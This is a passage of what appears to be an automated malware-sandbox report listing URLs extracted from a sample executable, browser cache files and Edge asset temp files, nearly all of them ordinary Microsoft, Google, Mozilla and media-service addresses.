Source: manifest.json0.9.dr String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-preprod.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive-staging.corp.google.com/
Source: manifest.json0.9.dr String found in binary or memory: https://drive.google.com/
Source: file.exe, 00000000.00000002.2625469567.0000000001327000.00000004.00000020.00020000.00000000.sdmp, JEHIJJKE.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: JEHIJJKE.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.2625469567.0000000001327000.00000004.00000020.00020000.00000000.sdmp, JEHIJJKE.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 000003.ldb.9.dr String found in binary or memory: https://edgeassetservice.azure
Source: 4163abde-9904-4e58-b214-c613a4eb5ed6.tmp.10.dr String found in binary or memory: https://edgeassetservice.azureedge.net
Source: 000003.ldb.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/
Source: 000003.log.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
Source: 000003.log.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
Source: 000003.log.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
Source: 000003.log0.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
Source: 000003.log.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
Source: 000003.log.9.dr String found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://excel.new?from=EdgeM365Shoreline
Source: chromecache_465.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_465.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_465.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_465.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://gaana.com/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://i.y.qq.com/n2/m/index.html
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://img-s-msn-com.akamaized.net/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
Source: BFHDHJKKJDHJJJJKEGHI.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://m.kugou.com/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://m.soundcloud.com/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://m.vk.com/
Source: 000003.ldb.9.dr String found in binary or memory: https://mail.google.com
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://music.amazon.com
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://music.apple.com
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://music.yandex.com
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://ntp.msn.cn/edge/ntp
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: 000003.ldb.9.dr, e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://open.spotify.com
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/0/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/0/
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
Source: chromecache_465.5.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_467.5.dr String found in binary or memory: https://plus.google.com
Source: chromecache_467.5.dr String found in binary or memory: https://plus.googleapis.com
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://sb.scorecardresearch.com/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://srtb.msn.cn/
Source: 2cc80dabc69f58b6_1.9.dr String found in binary or memory: https://srtb.msn.com/
Source: FHCGCFHDHIIIDGCAAEGDAFBFHD.0.dr String found in binary or memory: https://support.mozilla.org
Source: FHCGCFHDHIIIDGCAAEGDAFBFHD.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FHCGCFHDHIIIDGCAAEGDAFBFHD.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: e73f6d1a-e8c5-427c-81ec-803a519c2c1c.tmp.9.dr String found in binary or memory: https://tidal.com/
